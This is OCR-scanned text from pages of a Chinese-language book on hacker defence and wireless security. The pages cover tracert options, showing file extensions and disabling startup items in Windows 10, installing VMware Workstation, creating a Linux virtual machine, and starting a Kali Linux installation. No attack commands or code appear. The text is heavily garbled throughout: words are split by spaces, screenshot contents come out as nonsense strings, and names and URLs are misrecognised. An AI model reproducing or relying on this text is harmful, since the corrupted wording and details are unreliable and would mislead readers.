跳跃 点 。 
e -j Hostlist: 按照 主机 列表 中 的 地 址 
释放 源 路 由 。 
e -w Timeout: 指定 超时 时 间 间 隔 ， 默 
认 单 位 为 ms。 
e TargetName: 指定 目标 计算 机 。 
例如 : 如 果 想 查看 www.baidu.com 的 
路 由 与 局 域 网 络 连接 情况 ， 则 在 “命令 提 
示 符 ”窗口 中 输入 tracert www.baidu.com 
命令 ， 按 Enter 键 ， 下 图 为 其 显示 结果 。 


[-d] [-h MaximumHops] [-j 
[-w Timeout] [TargetName] 
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SS 黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


通过 个 中 点 
国 区 入 ia nuz ad 6 由 由 


《1 本 各 192. 168.0.1 
和 ms 


2.7 ”实战 演练 


实战 演练 1 一 一 显示 文件 的 后 缀 扩展 名 


Windows 10 系 统 默认 情况 下 并 不 显示 
文件 的 扩展 名 ， 用 户 可 以 通过 设置 显示 文 
件 的 扩展 名 。 具 体操 作 步 又 如 下 。 

[sp 加 单 去 “开始 ”按钮 ， 在 弹出 快捷 菜 
单 中 选择 “文件 资源 管理 器 ”选项 ， 打 开 
“文件 资源 管理 器 ”窗口 ， 如 下 图 所 示 。 


而 | 文治 源 攻 至 各 


6 x 
和 。 汪 丰 © 
个 卉 ， 忆 加 ~ 


选择 “查看 ”选项 卡 ， 在 打开 的 功能 
区 域 中 选中 “显示 /隐藏 ”区 域 的 “文件 扩 
展 名 ” 复 选 框 ， 如 下 图 所 示 。 


器 EE - 9 x 
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[step 图 此 时 打开 一 个 文件 夹 ， 用 户 便 可 以 查 
看 到 文件 的 扩展 名 ， 如 下 图 所 示 。 


EE 一 oO x 


实战 演练 2 一 一 关闭 开机 多 余 启 动 项 目 
在 计算 机 启动 的 过 程 中 ， 自 动 运行 的 
程序 叫 作 开机 启动 项 ， 有 时 一 些 木 马 病毒 
程序 会 在 开机 时 就 运行 ， 用 户 可 以 通过 关 
闭 开机 启动 项 目 来 提高 系统 安全 。 
具体 的 操作 步骤 如 下 。 
[sep 回 按键 盘 上 的 Ctrl+AltHDel 组 合 键 ， 打 
开 “ 任 务 管 理 器 ”界面 ， 如 下 图 所 示 。 


[Gp 国 单 直 “ 任 务 管理 器 ”选项 ， 打 开 “ 任 
务 管理 器 ”窗口 ， 如 下 图 所 示 。 


文件 个” 应 页 IO 二 看) 
进展 攻 角 应 用 历史 记录 启动 月 广 详 曲 信息 服务 


11% 58% 0% 0% 

Ba CPU 内 可 
应 月 

6 350 

围 Miceceft Word 

局 Windows 交大 雪 壬 (3) 

ed 
后 台 进 程 (41) 

后 350 安 全 对 

€ 3502 人 SB 

€ 350= 人 人 


第 2 章 无 线 网 络 攻防 必 备 知识 = 


[step 图 选择 “启动 ”选项 卡 ， 进 入 “启动 ” | 已 sea -0o Xx 
机 > 六 文件 ”远大 (0) 下 看 M) 
可 中 系统 当 
界面 ， 在 其 中 可 以 看 到 系统 当中 的 已 启用 | [Br nn Ei ji 
启动 项 列表 ， 如 下 图 所 示 。 
Ea 安 布 者 六 态 启动 & 痢 

局 [ES 二 百人 太 图 360 安 全 P+ 安全 防护 中 心 。 360cn 局 用 高 
文件 ( 骨 ” 迄 项 (O) 下 看 (V) BB Brindicator Brother Industries, Ltd 已 启用 中 
进程 ”性 能 “应 用 历史 记录 启动 用户 详细 信息 服务 避 crr mas Microsoft Corporation ”已 局 用 低 
Es ~ ee a ek 三 Microsoft OneDrive Microsoft Corporation 已 村 用 高 

国 3 EE a 留 status Monitor Application 。 Brother Industries Ltd， 已 启用 中 

瑟 Brindicator Brother Industries, Lid 已 启用 = 

团 cTF 坦 EB 冯 Micrcsoft Corporation ”已 启用 低 

三 Microsoft OneDrive Micresoft Corporation 已 启用 高 

Status Monitor Application Brother Industries, Ltd， 已 启用 中 

简略 信息 (D) 启用 (N) 

1 2.8 小 试 身 手 

简 政信 息 (D) A he 


[see 加 选择 开机 启动 项 列表 框 中 需要 禁用 的 练习 1: 查询 IP 地 址 。 
启动 项 ， 单 击 “ 禁 用 ”按钮 ， 即 可 禁用 该 练习 2: 查看 系统 开放 的 端口 。 
启动 项 ， 如 下 图 所 示 。 练习 3: 黑客 常用 攻击 命令 演练 。 
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第 3 章 


搭建 无 线 测试 系统 


Kali Linux 


无 线 技术 在 给 人 们 带 来 极 大 方便 的 同时 ， 也 带 来 了 极 大 的 信息 安全 风险 。 在 目前 ， 无 
论 是 企 事业 单位 还 是 家 庭 用 户 ， 安 全 意识 依然 薄弱 。 本 章 介绍 无 线 测试 系统 环境 的 搭建 ， 
主要 内 容 包 括 安装 与 创建 虚拟 机 、 安 装 与 更 新 Kali Linux 操 作 系 统 、 安 装 CDlinux 系 统 、 安 


装 与 使 用 靶 机 等 。 


3.1 安装 与 创建 虚拟 机 


对 于 无 线 安全 初学 者 ， 使 用 虚拟 机 构建 
无 线 测试 环境 是 一 个 非常 好 的 选择 ， 这 样 既 
可 以 快速 搭建 测试 环境 ， 同 时 还 可 以 快速 还 
原 之 前 快照 ， 避 免 错误 操作 造成 系统 崩 演 。 


3.1.1 下 载 虚 拟 机 软件 


虚拟 机 使 用 之 前 ， 需 要 从 官网 下 载 虚拟 
机 软件 vmware， 有 具体 的 操作 步骤 如 下 : 

Eee 加 使 用 浏览 器 打开 虚拟 机 官方 网 站 
https://my.vmware.com/cn， 进 入 虚拟 机 官网 
页 面 ， 如 下 图 所 示 。 


step 因 这 里 需要 注册 一 个 账号 ，vmware 支 

持 中 文 页 面 ， 正 常 注册 即 可 ， 注 册 完 成 

后 ， 进 入 所 有 下 载 页 面 ， 并 切换 到 “所 有 
品 ” 选 项 卡 ， 如 下 图 所 示 。 


所 有 下 载 
step 图 在 下 拉 页 面 找到 VMware Workstation 


Pro 对 应 选项 ， 单 击 右 侧 的 “查看 下 载 组 
件 ” 超 链接 ， 如 下 图 所 示 。 

ar moa | 
[tp 图 进入 VMware 下 载 页 面 ， 在 其 中 选择 


Windows 版 本 ， 单 击 右 侧 “ 转 至 下 载 ” 超 链 
接 ， 如 下 图 所 示 。 


VMware Workstation Pro 


WARETR EA rls0 


YYMware Workstation Pro 14.13 for Windows 


VMware Workstation Pro 14.4.3for Linux 


按钮 进行 下 载 ， 如 下 图 所 示 。 


文件 信息 


This Workstation product installation includes VMware | 
or Windows 6-bit operating systems. 


| 


3.1.2 ”安装 虚拟 机 软件 


虚拟 机 软件 下 载 完 成 后 ， 接 下 来 
就 可 以 安装 虚拟 机 软件 了 ， 这 里 下 载 
的 是 目前 最 新 版 本 “VMware-worksta- 
tion-full-14.1.2-9474260.exe”， 用 户 可 根据 
实际 情况 选择 当前 最 新 版 本 下 载 即 可 ， 安 
装 虚拟 机 的 具体 操作 步骤 如 下 : 

[step 图 双击 下 载 的 VMware 安 装 软件 ， 进 入 
“欢迎 使 用 VMware Workstation Pro” 窗 


了 解 于 多 信 息 


口 ， 如 下 图 所 示 。 


涛 vMware Workstation Pro 安装 一 x 


欢迎 使 用 VMware Workstation Pro 安装 向 导 


2" 


有 1998-2018 VMware, Fi 和 
让 


i 
[sep 图 单 去 “下 一 步 ”按钮 ， 进 入 “最 终 用 
户 许可 协议 ”窗口 ， 选 中 “我 接收 许可 协 
议 中 的 条 款 ” 复 选 框 ， 如 下 图 所 示 。 


娠 VMware Workstation Pro 安装 一 x 
最 终 用 户 许可 协议 
请 他 姻亲 次 下 许可 雹 议 * 
VMWARE 最 终 用 户 许可 协议 站 


请 注意 ， 在 本 软件 的 安装 过 程 中 无 论 可 能 会 出 现任 何 条 款 ， 
使 用 本 软件 都 将 受 此 最 终 用 户 许可 协议 各 条 款 的 约束 。 


| 重要 信息 ， 请 仔细 阅读 ， 您 一 旦 下 载 、 安 装 或 使 用 本 软件 ， 
您 (自然 人 或 法 人 ) 即 同意 接受 本 最 终 用 户 许可 协议 (“本 
协议 ”) 的 约束 。 如 果 您 不 同意 本 协议 的 条 款 ， 请 义 卜 载 、 
| 安装 或 使 用 本 软件 ， 您 必须 删除 本 软件 ， 或 在 三 十 (30) 天 _ ~ 


回 我 接受 许可 协议 中 的 条 款 (0) 

#0P) | | 上 -上 |[F-EW ] 【取消 
[step 图 单 去 “下 一 步 ” 按 钮 ， 进 入 “ 自 定义 
安装 ”窗口 ， 在 其 中 可 以 更 改 安装 路 径 也 
可 以 保持 默认 ， 如 下 图 所 示 。 


期 VMware Workstation pro 安装 一 x 
自 定义 安装 
选择 安装 目标 及 任何 其 他 功能 。 
安装 位 置 : 
D:\Program Files (x86)\WMware\ 和 更改.… 


口 塘 2 键盘 驱动 程序 ( 尖 要 重新 引导 以 使 用 此 功能 (E) 
此 功能 要 求 主机 驱动 器 上 县 有 10MB 空间 。 


ES® [500] | 有 


sp] 半 击 “下 一 步 ” 按 钮 ， 进 入 “用 户 体 
验 设置 ”窗口 ， 这 里 采用 系统 默认 设置 ， 
如 右上 图 所 示 。 
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期 VMware Workstation Pro 去 靳 一 X 


用 户 体验 设置 图 


编辑 默认 设置 以 提高 全 的 用 户 体验 。 


回 启动 时 检查 产品 更 新 CC) 
ee Workstation Pro 启动 时 ， 检 查 应 用 程序 和 已 安装 软件 组 件 是 否 有 


回 加 入 VMware 客户 体验 改进 计划 O) 
|vMware 客户 体验 提升 计划 (CEIP) 将 向 VMware 提供 相 人 
关 信息 ， 以 帮助 VMware 改进 产品 和 服务 、 解 决 问 
题 、 并 向 您 建议 如 何以 最 佳 方式 部 署 和 使 用 我 们 的 产 
品 。 作为 CElP 的 一 部 分 ，VMware 会 定期 收集 和 您 所 
持 有 的 VMware 密 钥 相关 的 使 用 VMware 产品 和 服务 的 x 
了 万 更 条 信息 


上 | [下 -500] [| 


单 击 “ 下 一 步 ” 按 钮 ， 进 入 “快捷 
方式 ”窗口 ， 在 其 中 可 以 创建 用 户 快捷 
方式 ， 这 里 可 以 保持 默认 设置 ， 如 下 图 
所 示 。 


期 vMware Workstation pro 去 凌 一 x 


2 y 


选择 您 要 小 入 系统 的 快捷 方式 。 


在 以 下 位 置 创建 VMware Workstaton Pro 的 快 毛 方式 : 
加 点 面 D) 
回 开 始 菜单 程序 文件 夹 (5) 


Ey | [下 09] | 


单 击 “ 下 一 步 ” 按 钮 ， 进 入 “已 准备 
好 安装 VMware workstation Pro” 页 面 ， 开 
始 准备 安装 虚拟 机 软件 ， 如 下 图 所 示 。 


期 VMware Workstation Pro 去 闭 一 X 


En 单 击 上 一 步 查 看 或 更 约 任 何 安装 设置 。 单 击 ' 取 消 户 出 向 


已 准备 好 安装 VMware Workstation pro 


LF-S®) 取消 
step 国 单 击 “安装 ”按钮 ， 等 待 一 段 时 间 后 
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搭建 无 线 测试 系统 Kali Linux 


SS 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


虚拟 机 便 可 以 安装 完成 ， 并 进入 “VMware 
workstation Pro 安 装 向 导 已 完成 ”窗口 ， 单 


击 “ 完 成 ”按钮 ， 关 闭 虚 拟 机 安装 向 导 ， 


如 下 图 所 示 。 


戎 VMware Workstation pro 安安 


WORKSTATION 


PRC 


4 


VMware Workstation Pro 安装 向 导 已 完成 


单 击 " 完 成 按钮 如 出 去 装 向 导 » 


i 请 技 下 面 和 7 许可 证 按 


一 x 


aa CS ] 


乔 VMware Workstation pro 去 站 


输入 许可 证 密 钥 
此 对 活 想 可 保存 产品 许可 证 记得 


许可 证 密 饥 属 式 : wooc-woo0c3o000 0000 0000 


[step 图 在 安装 完成 页 面 中 ， 
按钮 ， 跳 转 至 “输入 许可 证 密 钥 ”页 面 ， 在 
其 中 可 以 输入 许可 证 密 铀 ， 


BAL ed A 


单 击 “许可 证 ” 
如 下 图 所 示 。 


mis | CBXS] 


虚拟 机 安装 完成 后 ， 重 新 启动 系统 


后 ， 才 可 以 使 用 虚拟 机 ， 


至 此 ， 便 完成 了 


wmware 虚 拟 机 的 下 载 与 安装 ， 如 下 图 所 示 。 


捕 VMware Workstation pro 安 笑 


© Wm 


CE 


ED 


昌 3.1.3 ”创建 虚拟 机 系统 
安装 完 虚 拟 机 以 后 ， 


就 需要 创建 一 


_ 台 真正 的 虚拟 机 ， 为 后 续 的 测试 系统 做 准 
备 。 创 建 虚拟 机 的 具体 操作 步骤 如 下 : 


[step 国 双 去 桌面 安装 好 的 VMware 虚拟 机 图 


标 ， 打 开 VMware 虚 拟 机 软件 ， 如 下 图 所 示 。 
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Oe 
Eu Ma Sa wan 开 
Gm 


WORKSTATION 14 PR 


+ 加 


单 击 “ 创 建新 的 虚拟 机 ”按钮 ， 进 入 
“新 建 虚拟 机 向 导 ” 对 话 框 ， 在 其 中 选择 
“ 自 定义 ” 单 选 按钮 ， 如 下 图 所 示 。 


雪上 x 


欢迎 使 用 新 建 虚 拟 机 问 导 


议 希 望 使 用 什么 类 型 和 9 笨 注 ? 


口 奥 型 (推荐 MT) 
( 通过 几 个 简单 的 具 强 他 娃 Workstation 14.x 
rr 庶 扫 机。 


回 自 定 火 (而 加 )(C) 
到 建 沉 有 SC5[ 控制 器 类 型， 座 拱 谋 台 类 型 
Na VMware 产品 着 罕 性 入 高 级 过 项 


EE Ss [rs > 


[Eee 国 单 二 “下 一 步 ”按钮 ， 进 入 “选择 虚 
拟 机 硬件 兼容 性 ”对 话 框 ， 在 其 中 设置 虚 
拟 机 的 硬件 兼容 性 ， 这 里 采用 默认 设置 ， 
如 下 图 所 示 。 


职 消 


Fn x 
迁 笃 虚 取 机 要件 兼容 性 
该 所 机 村 要 何 种 重 件 功能 7 
者 名 本 全 兰 奉 性 
证 件 六 窑 性 (H): Woreetation 14 v 
和 EX sever(s) 
和 限制: 
ESXI 6.7 64 68 内 存 
Fusen 10. 15 个 处 理 中 
Workstation 14.x 10 个 了 网络 庆 
| 9 TB 碰 生 大 小 
ED < 上 (8) 取消 


[step 图 单 去 “下 一 步 ” 按 钮 ， 进 入 “安装 客 
户 机 操作 系统 ”对 话 框 ， 在 其 中 选择 “ 稍 后 
安装 操作 系统 ” 单 选 按钮 ， 如 下 图 所 示 。 


ET 


安装 育 户 所 所作 系统 
磺 让 机 如 有 和 帮 机 ， 寺 要 洪 作 不 绕 。 你 村 如 问 雪 闪 宫 户 机 拱 作 > 


x 


en: 
直 半 程序 江 六 (0 


天 有 里 


口 守 和 和 反光 组 扫 像 区 件 (soJ0MD); 


EpaiduNetdekDownlad\os X 10.11.1(15842) ed 


加 和 后 装 扫 作 系统 (5)。 
人 的 庶 检 机 所 包含 一个 全 昌 尖 在。 


Ed < 上 (8) 请 


单 击 “ 下 一 步 ” 按 钮 ， 进 入 “选择 客 
户 机 操作 系统 ”对 话 框 ， 在 其 中 选择 Linux 
单 选 按钮 ， 如 下 图 所 示 。 

新 奸 虚 涪 机 向 号 x 


选择 窒 户 机 操作 系统 
此 直 棋 中 本 灾 半 种 慢 作 系 扩 ? 


客户 机 查 作 系 扩 
OMicrosofe Wndows(W) 
图 unedb 

Onovel NerWarelE) 


Osolrs(s) 
VMware ESX(X) 
口 其 (oO) 


占 本 (V) 
Ubunty 


部 由 < 上 —() LD 


[step 图 单 去 “版 本 ”下 拉 按 钮 ， 在 弹出 的 下 
拉 列 表 中 选择 “其 他 Linux 4.x 或 更 高 版 本 
内 核 64” 版 本 系统 ， 这 里 的 系统 版 本 与 主 
机 系统 版 本 无 关 ， 可 以 自由 选择 ， 如 下 图 
所 示 。 


Red Hat EnterDiEe Lnux 4 64 位 ~ 


Red Hat Enterpiise Lnux 2 
Sun java Desktop System 


SUSE Lnux Entarpree 12 64 垃 
SUSE Lnux Enterprise 11 64 位 


SUSE Lnux Enterprise 10 
SUSE Lnux Enterprise 7/8/9 64 位 
ux Enterprise 718/9 
ux 64 位 
SUSE Lnux 
Turbolinux 64 位 
Turboinux 
Ubuntu 64 位 
Uburt 
VMware photon os 64 这 


其 他 Linux 4.x 或 重 高 版 本 内 棱 
车 Linux 3.x 肉 核 侠 位 
其 他 Linux 3.x 同 


TT TT -| 
BEE 国 单 二 “下 一 步 ” 按 乌 ， 进 入 “命名 诬 
拟 机 ”对 话 框 ， 在 “虚拟 机 名 称 ” 文 本 框 
中 输入 虚拟 机 名 称 ， 在 “位 置 ”中 选择 一 
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个 存放 虚拟 机 的 磁盘 位 置 ， 如 下 图 所 示 。 
新 这 去 拟 机 记 导 x 
病名 应 反 机 
入 着 归 和 所 机 和 用 什么 名和? 


二 机 名 称 (V): 
IaHinux 


EU: 
Vrsal Machinestkal lin 二 (R)... 


在 编辑 "> 首选 而 中 可 更 阔 歌 认 位 置 。 


< 上 —#(B) 取消 


[ep 图 单 去 “下 一 步 ” 按 钮 ， 进 入 “处 理 器 
配置 ”对 话 框 ， 在 其 中 选择 处 理 器 数量 ， 
一 般 普 通 计 算 机 都 是 单 处 理 ， 所 以 这 里 不 
用 设置 ， 处 理 器 内 核 数 量 可 以 根据 实际 处 
理 器 内 核 数量 设置 ， 如 下 图 所 示 。 


新 建 点 氢 册 户 导 x 
处 理 至 限于 
为 比 让 机 检定 处 理 吕 寺 轩 。 
OS 
加 3 二 (? i 加 
二 个 直 理 吕 的 上 术 量 (C) | 
| 
日 
12 
四 
E70 < 上 —#(8) 取消 


单 击 “ 下 一 步 ” 按 钮 ， 进 入 “此 虚拟 
机 的 内 存 ” 对 话 框 ， 根 据 实际 主机 进行 设 
置 ， 最 少 内 存 不 能 低 于 768MB， 这 里 选择 
4096MB 也 就 是 4G 内 存 ， 如 下 图 所 示 。 


ed x 


此 虚 沁 机 的 内 存 
您 要 为 此 虚拟 机 使 用 多 少 内 存 ? 
措 定 分 要 芭 此 庶 汶 外 的 内 有 里。 内 存 大 小 必须 为 4 MB 的 入 数 * 


ed 此 去 到 机 乓 内 存 (M): 


了 ”本 最 大 推荐 闪存: 
人 52 6GB 
1 
ao 导 ” 司 推荐 内: 
256 虽 768ME 


vB 了 容 户 机 时 作 系统 最 低 准 逢 内 存 : 
20 a 32MB 


EJ < EF-#(0) EE 
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单 击 “ 下 一 步 ” 按 钮 ， 进 入 “选择 
磁盘 类 型 ”对 话 框 ， 这 里 选择 SCSI 单 选 按 
钮 ， 如 下 图 所 示 。 
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step 回 单 去 “下 一 步 ” 按 钮 ， 进 入 “网 络 类 [Step 本 单 击 “ 下 一 步 ” 按 钮 ， 进 入 “选择 
型 ”对 话 框 ， 这 里 选择 “使 用 网 络 地 址 转 磁盘 ”对 话 框 ， 这 里 选择 “创建 新 虚拟 磁 


» 请 洗 校 示 2 前 着 过 二 
换 NAT” 单 选 按钮 ， 如 下 图 所 示 。 盘 ” 单 选 按钮 ， 如 下 图 所 示 。 
新 建 上 所 中 向 导 区 eS x 
网 络 类 型 远 愉 大 关 
要 添加 时 类 网 六 ? 总 要 合用 吉庆 得 7 
网 络 连接 和 
口 合用 祈 按 网 络 (R) i 
为 究 户 机 旨 作 系统 提 红 直接 访问 外 部 以 太 有 3 络 的 权限 。 窜 户 机 在 外 部 哆 络 上 必须 旧业 全 由 主 中 立 件 系统 上 的 -个 或 个 文件 组 成 ， 宫 户 册 报 作 素 综 全 格 基 为 
有 BP 地 由 。 单个 硬 侈 虞 执 三 和 可 在 一 台 主 机 上 或 名 主机 之 间 径 梳 夺 制 或 称 动 > 
图 使 用 网 络 地 址 转换 (NATJCE) a 和 
为 宣 户 机 操作 系统 提供 使 用 主机 玉 地 址 访问 主机 按 号 连接 或 外 部 以 太 同 F3 这 接 的 〇 使用 现 有 大 所 磋 条 (E) 
0 选 有 此 这 可 重 新 合用 以 前 本 天 的 壕 盘 。 
口 使 用 仆 主 机 模式 同 络 (4) 口 使 用 氏 弄 二 盘 (适用 于 高 级 用 户 JIP) 
将 客户 机 冯 作 系统 连接 到 主机 上 的 专 月 虚 的 网 结 。 选 过 此 该 5] 为 座机 扣 代 直接 访 避 本 地 三 和 的 权限 。 吉 要 县 有 管 曙 员 特权 。 
口 不 使 用 网 络 连 接 (T) 
EL -#8) | [下 -0D > 可 消 
Ey < 上 A = 


Bp 国 单 击 “ 下 一 步 ”按钮 ， 进 入 “选择 I/ [So 国 单 二 “下 一 步 ” 按 钮 ， 进 入 “指定 磁 


O 控 制 器 类 型 ”对 话 框 ， 这 里 选择 LSI Logic 盘 容 量 ” 对 话 框 ， 这 里 磁盘 大 小 设置 40GB 


单 选 按钮 ， 如 下 图 所 示 。 空间 即 可 ， 选择 “将 虚拟 盘 拆 分 成 多 个 文 


9 论 
件 ” 单 选 按钮 ， 如 下 图 所 示 。 
新 于 直 拉 中 内 导 X 
选择 /0 控制 器 类 型 MN 关 
外 要 借用 何 各 次 到 
您 要 使 用 何 种 类 5c51 控制 器 ?7 人 于 二 放量 
醚 盘 大 小 为 各 少 ? 
J 控制 加 类 
cs 部 及: 加 重大 人 (GE)XGS):| 19 区 
人 区 其 他 Lnu 4x 民 上 内 权 64 位 的 建议 大 小 : 8 GB 
@LsILogc(L) (推荐) 
Os Logic SAS(S) 口 立 风 分 R 和 有 大盘 空间 (A) 
分 本 所 有 育 量 可 以 总 性能， 作 要 下 所有 物 笛 必 角 空 人 立即 可 用 。 加 时 不 立 了 分 了 所 有 
空 站， 上 ji 和 的 宇 间隔 沪 搞 小 ， 会 科 关 人 向 二 中 法 可 前 所 而 不 由 灾 大 。 
口 竺 谎 JWit 各 存放 为 单个 文件 (O) 
国有 册 Hi 委 折 分 成 杀人 文件 (N) 
所， 
部 且 < 上 —$(8) 取 肖 
ED < 上 —B(B) 取消 


单 击 “下 一 步 ”按钮 ， 进 入 “指定 磁 
盘 文件 ”对 话 框 ， 这 里 保持 默认 即 可 ， 如 


下 图 所 示 。 
新 上 直 拟 包 向 导 x 
新 奎 频 拟 机 向 导 x 
选择 赔 盘 类 型 让 
起 癌 种 磁盘 ? 
a 总 要 在 何 处 存放 磋 盘 文件 ? 
类 型 
谤 明文 件 (有 ) 
So 区 使 用 条 个 斌 铭文 件 创建 一 个 40 63 雇 报 度 盘 ， 扣 根据 比 妇 件 名 自动 命名 这 些 说 盘 文 
图 SCSIS) (推荐 ) 件 * 
OSAAAN Eenuz vmod ET 
ONVMe(V) 
才 且 < 上 —$(8) 到 清 者 二 <+—(8) | [下 -上 0D > 取 江 


Estee 加 单 去 “下 一 步 ” 按 钮 ， 进 入 “已 准备 
好 创建 虚拟 机 ”对 话 框 ， 如 下 图 所 示 。 


新 建 幸 枚 机 启 写 蛇 


己 准 备 好 创建 诺 所 机 
时.。 约 J 以 法 其 信 Unux 4 高 六 64 


指使 用 下 列 设置 创 时 虚拟 机 : 


名 称 

位 置 

版 本 : 

操作 系统 | 

硬盘: 40 G8, 折 分 

站 三 4096 NB 

网 络 适配器 NAT 

其 他 疫 备 + 个 CPU 内 检 , CD/DVD, USB 控制 器 , 打 EP 机 , 再 卡 
自 定 尽 硬件 (C)… 


< RR | wh 


[step 孜 单 击 “ 完 成 ”按钮 ， 至 此 ， 便 创建 了 
一 个 新 的 虚拟 机 ， 如 下 图 所 示 。 这 一 步 相 
当 于 组 装 了 一 台 裸 机 计算 机 ， 这 当中 的 硬 
件 设 配 ， 可 以 根据 实际 需求 再 进行 更 改 。 


[TRY 本 
Asn Wt EM NI RD wa | ~ Eo | 


A | tm 


加 kali-Linux 


pl 


3.2 ”安装 与 更 新 Kali Linux 操 


作 系 统 
现实 中 组 装 好 计算 机 以 后 需要 给 它 安装 
一 个 系统 ， 这 样 计算 机 才 可 以 正常 工作 ， 虑 


拟 机 也 一 样 ， 同 样 需要 安装 一 个 操作 系统 ， 
本 节 介 绍 如 何 安装 Kali Linux 操 作 系统 。 


3.2.1 下 载 Kali Linux 系 统 


Kali Linux 是 基于 Debian 的 Linux 发 行 
版 ， 设 计 用 于 数字 取证 操作 系统 。 由 Offen- 
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sive Security Ltd 维 护 和 资助 。 最 先 由 Offen- 
sive Security 的 Mati Aharoni 和 Devon Keams 
通过 重 写 BackTrack 来 完成 ，BackTrack 是 他 
们 之 前 写 的 用 于 取证 的 Linux 发 行 版 。 

下 载 Kali Linux 系 统 的 具体 操作 步 又 
如 下 : 
[step 图 在 浏览 器 中 输入 Kali Linux 系 统 的 网 
址 : https: Wwww.kali.org， 按 Enter 键 打开 
Kali 官 方 网 站 ， 如 下 图 所 示 。 


KALI 


Our Most Advanced Penetration Testing Distribution, Ever, 


t Kali Linux News and Tutorial 


EE 
| OVE 


oem SFE 


单 击 Downloads 菜 单 ， 在 弹出 的 菜单 
列表 中 选择 Download Kail Linux 选 项 ， 如 下 
图 所 示 。 

Downloads Training 

Kali Linux NetHunter 

Kali Linux Revealed Book 


Release Information 


[step 图 Kaili 提 供 了 各 种 版 本 的 系统 下 载 ， 用 
户 可 以 通过 HTTP 或 者 Torrent 两 种 方式 进行 
下 载 ， 如 下 图 所 示 。 用 户 可 根据 实际 情况 
选择 下 载 相 应 的 版 本 ， 这 里 选择 最 上 面 一 项 
“Kali Linux 64 Bit” 进 行 下 载 。 
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[step 园 Kali 官 方 还 提供 了 快速 装机 方式 
wmware 镜 像 下 载 ， 这 个 列表 不 但 提供 了 
wmware 虚 拟 机 镜像 ， 还 提供 了 vobx 虚 拟 镜 
像 ， 如 下 图 所 示 。 


Available en the Denaie Secar 


侈 提示 : 初学 者 建议 先 手动 安装 Kali Linux 
系统 ， 以 后 使 用 熟练 后 可 以 选择 虚拟 机 镜 
像 安装 。 


名 3.2.2 ”安装 Kali Linux 系 统 

架设 好 虚拟 机 并 下 载 好 Kali Linux 系 统 
后 ， 接 下 来 便 可 以 安装 Kali Linux 系 统 了 。 
安装 Kali 操 作 系统 的 具体 操作 步骤 如 下 : 
step 加 打开 安装 好 的 虚拟 机 ， 单 击 CD/DVD 


Sn 


[step 园 在 打开 的 “连接 ”界面 中 选择 “使 用 
ISO 映像 文件 ” 单 选 按 钮 ， 如 下 图 所 示 。 


连接 
口 使 用 物理 驱动 器 (P): 
自动 检测 
@ 使 用 150 映像 文件 (M): 
[Db:\BaduNetdskDownload\lc ~ 
高 RV)... 


step 图 单 击 “浏览 ”按钮 打开“ 浏览 ISO 
影像 ”对 话 框 ， 在 其 中 选择 下 载 好 的 系统 
映像 文件 ， 如 右上 图 所 示 。 
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Estee 加 单 去“ 打开 ”按钮 ， 返 回 到 虚拟 机 
设置 界面 ， 这 里 单 击 “ 开 启 此 虚拟 机 ” 选 
项 ， 便 可 以 启动 虚拟 机 ， 如 下 图 所 示 。 


YE 各 
两 mm 468 
口 全 关 
Bm cs 0 G8 
D/OVD O08 LER D. 
EE NAT 
加 use a FE 
时 上 电动 区 
Bm FE 
屡 汪 地 知 Gb 


启动 虚拟 机 后 会 进入 到 启动 选项 界 
面 ， 用 户 可 以 通过 键盘 上 下 键 选择 Graphical 
install 选 项 ， 如 下 图 所 示 。 


[step 图 选择 完毕 后 ， 按 Enter 键 ， 进 入 语言 选 
择 界 面 ， 这 里 选择 “ 
下 图 所 示 。 


A 


简体 中 文 ”选项 ， 如 


step 园 单 击 Continue 按 钮 ， 进 入 选择 语言 
确认 界面 ， 保 持 系统 默认 设置 ， 如 下 图 
所 示 。 


Salect 3 language 


和 内地， 


和 人 有 人 
妇 时 下 才 ， 各 车 丰 可 用 ， 风 以 
Ce 

) 百 

于 


| mwam | 国足 EP 
单 击 “ 继 续 ” 按 钮 ， 进 入 “请 选择 您 
的 区 域 ”界面 ， 它 会 自动 上 网 匹配 。 即 使 不 
正确 也 没有 关系 ， 系 统 安装 完成 后 还 可 以 调 
整 ， 这 里 保持 默认 设置 ， 如 下 图 所 示 。 


了 和 志和 机 半 了 届 和 和风 站 区 以 从 只 全 可 二村 ， 轩 玉生 和约 
术科 多 天生， 站， 


单 击 “继续 ”按钮 ， 进 入 “请 选择 键 
盘 映 像 ” 界面， 同样 系统 会 根据 语言 选择 
来 自行 匹配 ， 这 里 保持 默认 设置 ， 如 下 图 
所 示 。 


| ma 


NEE (DS FR) 
NE 


大 
| 


step 轿 单 击 “继续 ”按钮 ， 进 入 “配置 网 
络 ” 界 面 ， 这 里 需要 输入 一 个 主机 名 称 ， 
如 输入 Kali， 如 右上 图 所 示 。 
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Emme 
HAWNERS. 

二 机 二天 和牛 灯 ， 扫 要 和 不 主机 世 是 什 妈 ， 天 网 尖 和 具有 和 下 在 内部 网 引 ， 贡 可以 有 写 个 
EE 


了 
区 ] 


Rann rmi 
step 了 加 单 击 “ 继 续 ” 按 钮 ， 进 入 “配置 网 
络 ” 界 面 ， 这 里 可 以 输入 一 个 域名 ， 也 可 
以 设置 域名 为 空 ， 如 下 图 所 示 。 


和 本 .com net ‘du 本 -org 人 下 
Te tr 
5 


[ ] 


ra 


[step 图 按 Enter 键 ， 进 入 “Root 用 户 密 码 ” 界 
面 ， 这 里 可 以 设置 两 个 相同 的 密码 ， 如 下 
图 所 示 。 

| Root 用 Pg 到 | 


上 且 示 明文 密码 | 
为 了 保证 您 的 密码 正确 无 误 ， 请 再 次 输入 相同 的 root 密码 。 
请 再 次 兽人 匣 三 以 验证 其 正确 星 : 

| 

6 星 示 明文 密码 


[step 图 按 Enter 键 ， 进 入 磁盘 划分 界面 ， 新 手 
建议 不 划分 也 就 是 选择 “使 用 整个 磁盘 ” 
选项 ， 如 下 图 所 示 。 


向导 - 使 用 整个 磁盘 
| 向 导 - 使 用 整个 磁盘 并 配置 LVM 

向 导 - 使 用 整个 磁盘 并 配置 加 密 的 LVM 
[sa 


step 贺 按 Enter 键 ， 进 入 选择 分 区 磁盘 界面 ， 
这 里 可 以 保持 默认 设置 ， 如 下 图 所 示 。 


注意 ， 所 选 磁盘 上 的 全 部 数据 都 将 被 铀 除 ， 但 是 您 还 是 有 确认 是 知 真 的 要 这 么 做 的 机 会 。 
请 进 痒 要 分 区 的 磁盘 : 


SCSIl (0,0,0) (sda) - 42.9 GB VMware, VMware Virtual S 


